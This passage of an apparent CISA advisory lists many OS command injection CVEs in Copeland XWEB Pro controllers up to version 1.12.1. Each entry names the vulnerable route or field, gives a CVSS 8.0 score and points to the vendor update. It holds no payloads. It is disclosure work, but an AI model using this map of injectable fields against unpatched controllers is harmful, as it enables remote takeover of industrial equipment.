<p>An OS Command injection vulnerability exists in XWEB Pro version 1.12.1 and prior, enabling an authenticated attacker to achieve remote code execution on the system by injecting malicious input into requests sent to the restore route.</p>
<p><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-25111">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Copeland XWEB and XWEB Pro</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Copeland</div>
<div class="ics-version"><strong>Product Version:</strong><br>Copeland XWEB 300D PRO: &lt;=1.12.1, Copeland XWEB 500D PRO: &lt;=1.12.1, Copeland XWEB 500B PRO: &lt;=1.12.1</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Copeland has provided a fix for the vulnerabilities and recommends users update the XWEB Pro to the latest version by going to their software update page https://webapps.copeland.com/Dixell/Pages/SystemSoftwareUpdate in the sections dedicated to the different XWEBPRO models page.</p>
<p><strong>Mitigation</strong><br>Alternatively, a user logged into an XWEB Pro with internet access can update XWEB Pro directly from Copeland servers via the menu SYSTEM -- Updates | Network.</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/78.html">CWE-78 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H">CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-20742</a></h3>
<div class="csaf-accordion-content">
<p>An OS Command injection vulnerability exists in XWEB Pro version 1.12.1 and prior, enabling an authenticated attacker to achieve remote code execution on the system by injecting malicious input into requests sent to the templates route.</p>
<p><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-20742">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Copeland XWEB and XWEB Pro</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Copeland</div>
<div class="ics-version"><strong>Product Version:</strong><br>Copeland XWEB 300D PRO: &lt;=1.12.1, Copeland XWEB 500D PRO: &lt;=1.12.1, Copeland XWEB 500B PRO: &lt;=1.12.1</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Copeland has provided a fix for the vulnerabilities and recommends users update the XWEB Pro to the latest version by going to their software update page https://webapps.copeland.com/Dixell/Pages/SystemSoftwareUpdate in the sections dedicated to the different XWEBPRO models page.</p>
<p><strong>Mitigation</strong><br>Alternatively, a user logged into an XWEB Pro with internet access can update XWEB Pro directly from Copeland servers via the menu SYSTEM -- Updates | Network.</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/78.html">CWE-78 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H">CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-24517</a></h3>
<div class="csaf-accordion-content">
<p>An OS Command injection vulnerability exists in XWEB Pro version 1.12.1 and prior, enabling an authenticated attacker to achieve remote code execution on the system by injecting malicious input into requests sent to the firmware update route.</p>
<p><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-24517">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Copeland XWEB and XWEB Pro</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Copeland</div>
<div class="ics-version"><strong>Product Version:</strong><br>Copeland XWEB 300D PRO: &lt;=1.12.1, Copeland XWEB 500D PRO: &lt;=1.12.1, Copeland XWEB 500B PRO: &lt;=1.12.1</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Copeland has provided a fix for the vulnerabilities and recommends users update the XWEB Pro to the latest version by going to their software update page https://webapps.copeland.com/Dixell/Pages/SystemSoftwareUpdate in the sections dedicated to the different XWEBPRO models page.</p>
<p><strong>Mitigation</strong><br>Alternatively, a user logged into an XWEB Pro with internet access can update XWEB Pro directly from Copeland servers via the menu SYSTEM -- Updates | Network.</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/78.html">CWE-78 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H">CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-25195</a></h3>
<div class="csaf-accordion-content">
<p>An OS Command injection vulnerability exists in XWEB Pro version 1.12.1 and prior, enabling an authenticated attacker to achieve remote code execution on the system by supplying a crafted firmware update file via the firmware update route.</p>
<p><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-25195">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Copeland XWEB and XWEB Pro</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Copeland</div>
<div class="ics-version"><strong>Product Version:</strong><br>Copeland XWEB 300D PRO: &lt;=1.12.1, Copeland XWEB 500D PRO: &lt;=1.12.1, Copeland XWEB 500B PRO: &lt;=1.12.1</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Copeland has provided a fix for the vulnerabilities and recommends users update the XWEB Pro to the latest version by going to their software update page https://webapps.copeland.com/Dixell/Pages/SystemSoftwareUpdate in the sections dedicated to the different XWEBPRO models page.</p>
<p><strong>Mitigation</strong><br>Alternatively, a user logged into an XWEB Pro with internet access can update XWEB Pro directly from Copeland servers via the menu SYSTEM -- Updates | Network.</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/78.html">CWE-78 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H">CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-20910</a></h3>
<div class="csaf-accordion-content">
<p>An OS Command injection vulnerability exists in XWEB Pro version 1.12.1 and prior, enabling an authenticated attacker to achieve remote code execution on the system by injecting malicious input into the devices field of the firmware update update action to achieve remote code execution.</p>
<p><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-20910">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Copeland XWEB and XWEB Pro</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Copeland</div>
<div class="ics-version"><strong>Product Version:</strong><br>Copeland XWEB 300D PRO: &lt;=1.12.1, Copeland XWEB 500D PRO: &lt;=1.12.1, Copeland XWEB 500B PRO: &lt;=1.12.1</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Copeland has provided a fix for the vulnerabilities and recommends users update the XWEB Pro to the latest version by going to their software update page https://webapps.copeland.com/Dixell/Pages/SystemSoftwareUpdate in the sections dedicated to the different XWEBPRO models page.</p>
<p><strong>Mitigation</strong><br>Alternatively, a user logged into an XWEB Pro with internet access can update XWEB Pro directly from Copeland servers via the menu SYSTEM -- Updates | Network.</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/78.html">CWE-78 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H">CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-24689</a></h3>
<div class="csaf-accordion-content">
<p>An OS Command injection vulnerability exists in XWEB Pro version 1.12.1 and prior, enabling an authenticated attacker to achieve remote code execution on the system by injecting malicious input into the devices field of the firmware update apply action.</p>
<p><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-24689">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Copeland XWEB and XWEB Pro</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Copeland</div>
<div class="ics-version"><strong>Product Version:</strong><br>Copeland XWEB 300D PRO: &lt;=1.12.1, Copeland XWEB 500D PRO: &lt;=1.12.1, Copeland XWEB 500B PRO: &lt;=1.12.1</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Copeland has provided a fix for the vulnerabilities and recommends users update the XWEB Pro to the latest version by going to their software update page https://webapps.copeland.com/Dixell/Pages/SystemSoftwareUpdate in the sections dedicated to the different XWEBPRO models page.</p>
<p><strong>Mitigation</strong><br>Alternatively, a user logged into an XWEB Pro with internet access can update XWEB Pro directly from Copeland servers via the menu SYSTEM -- Updates | Network.</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/78.html">CWE-78 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H">CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-25109</a></h3>
<div class="csaf-accordion-content">
<p>An OS Command injection vulnerability exists in XWEB Pro version 1.12.1 and prior, enabling an authenticated attacker to achieve remote code execution on the system by injecting malicious input into the devices field when accessing the get setup route, leading to remote code execution.</p>
<p><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-25109">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Copeland XWEB and XWEB Pro</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Copeland</div>
<div class="ics-version"><strong>Product Version:</strong><br>Copeland XWEB 300D PRO: &lt;=1.12.1, Copeland XWEB 500D PRO: &lt;=1.12.1, Copeland XWEB 500B PRO: &lt;=1.12.1</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Copeland has provided a fix for the vulnerabilities and recommends users update the XWEB Pro to the latest version by going to their software update page https://webapps.copeland.com/Dixell/Pages/SystemSoftwareUpdate in the sections dedicated to the different XWEBPRO models page.</p>
<p><strong>Mitigation</strong><br>Alternatively, a user logged into an XWEB Pro with internet access can update XWEB Pro directly from Copeland servers via the menu SYSTEM -- Updates | Network.</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/78.html">CWE-78 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H">CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-20902</a></h3>
<div class="csaf-accordion-content">
<p>An OS Command injection vulnerability exists in XWEB Pro version 1.12.1 and prior, enabling an authenticated attacker to achieve remote code execution on the system by injecting malicious input into the map filename field during the map upload action of the parameters route.</p>
<p><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-20902">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Copeland XWEB and XWEB Pro</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Copeland</div>
<div class="ics-version"><strong>Product Version:</strong><br>Copeland XWEB 300D PRO: &lt;=1.12.1, Copeland XWEB 500D PRO: &lt;=1.12.1, Copeland XWEB 500B PRO: &lt;=1.12.1</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Copeland has provided a fix for the vulnerabilities and recommends users update the XWEB Pro to the latest version by going to their software update page https://webapps.copeland.com/Dixell/Pages/SystemSoftwareUpdate in the sections dedicated to the different XWEBPRO models page.</p>
<p><strong>Mitigation</strong><br>Alternatively, a user logged into an XWEB Pro with internet access can update XWEB Pro directly from Copeland servers via the menu SYSTEM -- Updates | Network.</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/78.html">CWE-78 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H">CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-24695</a></h3>
<div class="csaf-accordion-content">
<p>An OS Command injection vulnerability exists in XWEB Pro version 1.12.1 and prior, enabling an authenticated attacker to achieve remote code execution on the system by injecting malicious input into OpenSSL argument fields within requests sent to the utility route, leading to remote code execution.</p>
<p><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-24695">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Copeland XWEB and XWEB Pro</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Copeland</div>
<div class="ics-version"><strong>Product Version:</strong><br>Copeland XWEB 300D PRO: &lt;=1.12.1, Copeland XWEB 500D PRO: &lt;=1.12.1, Copeland XWEB 500B PRO: &lt;=1.12.1</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Copeland has provided a fix for the vulnerabilities and recommends users update the XWEB Pro to the latest version by going to their software update page https://webapps.copeland.com/Dixell/Pages/SystemSoftwareUpdate in the sections dedicated to the different XWEBPRO models page.</p>
<p><strong>Mitigation</strong><br>Alternatively, a user logged into an XWEB Pro with internet access can update XWEB Pro directly from Copeland servers via the menu SYSTEM -- Updates | Network.</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/78.html">CWE-78 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H">CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-25105</a></h3>
<div class="csaf-accordion-content">
<p>An OS Command injection vulnerability exists in XWEB Pro version 1.12.1 and prior, enabling an authenticated attacker to achieve remote code execution on the system by injecting malicious input into parameters of the Modbus command tool in the debug route.</p>
<p><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-25105">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Copeland XWEB and XWEB Pro</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Copeland</div>
<div class="ics-version"><strong>Product Version:</strong><br>Copeland XWEB 300D PRO: &lt;=1.12.1, Copeland XWEB 500D PRO: &lt;=1.12.1, Copeland XWEB 500B PRO: &lt;=1.12.1</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Copeland has provided a fix for the vulnerabilities and recommends users update the XWEB Pro to the latest version by going to their software update page https://webapps.copeland.com/Dixell/Pages/SystemSoftwareUpdate in the sections dedicated to the different XWEBPRO models page.</p>
<p><strong>Mitigation</strong><br>Alternatively, a user logged into an XWEB Pro with internet access can update XWEB Pro directly from Copeland servers via the menu SYSTEM -- Updates | Network.</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/78.html">CWE-78 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H">CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-24452</a></h3>
<div class="csaf-accordion-content">
<p>An OS Command injection vulnerability exists in XWEB Pro version 1.12.1 and prior, enabling an authenticated attacker to achieve remote code execution on the system by supplying a crafted template file to the devices route.</p>
<p><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-24452">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Copeland XWEB and XWEB Pro</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Copeland</div>
<div class="ics-version"><strong>Product Version:</strong><br>Copeland XWEB 300D PRO: &lt;=1.12.1, Copeland XWEB 500D PRO: &lt;=1.12.1, Copeland XWEB 500B PRO: &lt;=1.12.1</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Copeland has provided a fix for the vulnerabilities and recommends users update the XWEB Pro to the latest version by going to their software update page https://webapps.copeland.com/Dixell/Pages/SystemSoftwareUpdate in the sections dedicated to the different XWEBPRO models page.</p>
<p><strong>Mitigation</strong><br>Alternatively, a user logged into an XWEB Pro with internet access can update XWEB Pro directly from Copeland servers via the menu SYSTEM -- Updates | Network.</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/78.html">CWE-78 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H">CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-23702</a></h3>
<div class="csaf-accordion-content">
<p>An OS Command injection vulnerability exists in XWEB Pro version 1.12.1 and prior, enabling an authenticated attacker to achieve remote code execution on the system by sending malicious input injected into the server username field of the import preconfiguration action in the API V1 route.</p>
<p><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-23702">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Copeland XWEB and XWEB Pro</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Copeland</div>
<div class="ics-version"><strong>Product Version:</strong><br>Copeland XWEB 300D PRO: &lt;=1.12.1, Copeland XWEB 500D PRO: &lt;=1.12.1, Copeland XWEB 500B PRO: &lt;=1.12.1</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Copeland has provided a fix for the vulnerabilities and recommends users update the XWEB Pro to the latest version by going to their software update page https://webapps.copeland.com/Dixell/Pages/SystemSoftwareUpdate in the sections dedicated to the different XWEBPRO models page.</p>
<p><strong>Mitigation</strong><br>Alternatively, a user logged into an XWEB Pro with internet access can update XWEB Pro directly from Copeland servers via the menu SYSTEM -- Updates | Network.</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/78.html">CWE-78 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H">CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-25721</a></h3>
<div class="csaf-accordion-content">
<p>An OS Command injection vulnerability exists in XWEB Pro version 1.12.1 and prior, enabling an authenticated attacker to achieve remote code execution on the system by injecting malicious input into the server username and/or password fields of the restore action in the API V1 route.</p>
<p><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-25721">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Copeland XWEB and XWEB Pro</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Copeland</div>
<div class="ics-version"><strong>Product Version:</strong><br>Copeland XWEB 300D PRO: &lt;=1.12.1, Copeland XWEB 500D PRO: &lt;=1.12.1, Copeland XWEB 500B PRO: &lt;=1.12.1</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Copeland has provided a fix for the vulnerabilities and recommends users update the XWEB Pro to the latest version by going to their software update page https://webapps.copeland.com/Dixell/Pages/SystemSoftwareUpdate in the sections dedicated to the different XWEBPRO models page.</p>
<p><strong>Mitigation</strong><br>Alternatively, a user logged into an XWEB Pro with internet access can update XWEB Pro directly from Copeland servers via the menu SYSTEM -- Updates | Network.</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/78.html">CWE-78 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H">CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-20764</a></h3>
<div class="csaf-accordion-content">
<p>An OS Command injection vulnerability exists in XWEB Pro version 1.12.1 and prior, enabling an authenticated attacker to achieve remote code execution on the system by providing malicious input via the device hostname configuration which is later processed during system setup, resulting in remote code execution.</p>
